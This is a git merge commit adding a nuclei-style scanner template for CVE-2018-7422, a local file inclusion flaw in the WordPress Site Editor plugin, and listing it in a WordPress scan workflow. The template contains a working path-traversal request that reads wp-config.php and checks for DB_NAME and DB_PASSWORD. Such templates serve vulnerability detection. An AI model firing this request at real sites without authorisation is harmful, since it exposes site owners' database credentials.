Merge pull request #1256 from projectdiscovery/CVE-2018-7422

Adding CVE-2018-7422
2021-04-11 15:52:33 +05:30 · 2021-04-11 15:52:33 +05:30 · 1aec0fe07e
parent aca2f3884e b5dab216c5
commit 1aec0fe07e
2 changed files with 28 additions and 0 deletions
--- a/cves/2018/CVE-2018-7422.yaml
+++ b/cves/2018/CVE-2018-7422.yaml
@ -0,0 +1,27 @@
+id: CVE-2018-7422
+
+info:
+  name: WordPress Site Editor Plugin LFI
+  author: LuskaBol
+  severity: high
+  tags: cve,cve2018,wordpress,wp-plugin,lfi
+  description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
+  reference: https://www.exploit-db.com/exploits/44340
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/workflows/wordpress-workflow.yaml
+++ b/workflows/wordpress-workflow.yaml
@ -14,6 +14,7 @@ workflows:
          - template: cves/2016/CVE-2016-10033.yaml
          - template: cves/2017/CVE-2017-1000170.yaml
          - template: cves/2018/CVE-2018-3810.yaml
+          - template: cves/2018/CVE-2018-7422.yaml
          - template: cves/2019/CVE-2019-6112.yaml
          - template: cves/2019/CVE-2019-6715.yaml
          - template: cves/2019/CVE-2019-9978.yaml